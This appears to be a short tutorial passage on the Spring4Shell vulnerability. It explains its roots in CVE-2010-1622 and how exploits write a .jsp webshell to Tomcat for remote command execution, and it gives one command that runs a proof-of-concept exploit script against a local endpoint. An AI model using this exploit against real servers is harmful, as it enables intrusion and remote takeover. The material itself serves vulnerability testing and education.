To understand Spring4Shell, it is important that we understand CVE-2010-1622. Spring MVC (Model-View-Controller) is part of the Spring Framework which makes it easy to develop web applications following the MVC design pattern. One of the features of Spring MVC is that it automatically instantiates and populates an object of a specified class when a request is made based on the parameters sent to the endpoint. In simple terms, this could be abused to overwrite important attributes of the parent class, resulting in remote code execution.
Spring4Shell works along similar lines, bypassing the mitigations that were added to patch CVE-2010-1622. The majority of the exploits for the Spring4Shell vulnerability operate by forcing the application to write a malicious .jsp
file (effectively plaintext Java which Tomcat can execute — much like a PHP webserver would execute files with a .php
extension) to the webserver. This webshell can then be executed to gain remote command execution over the target.
First thing to do is to identify the exact endpoint vulnerable to the Spring4Shell:
There is a PoC very useful to test spring4shell vulnerability with following command:
1
python exploit.py --url "http://localhost:8080/helloworld/greeting" --dir=webapps/greeting
Notice the use of the flag “–dir” which is totally optional unless you need to upload the .jsp payload into an specific directory.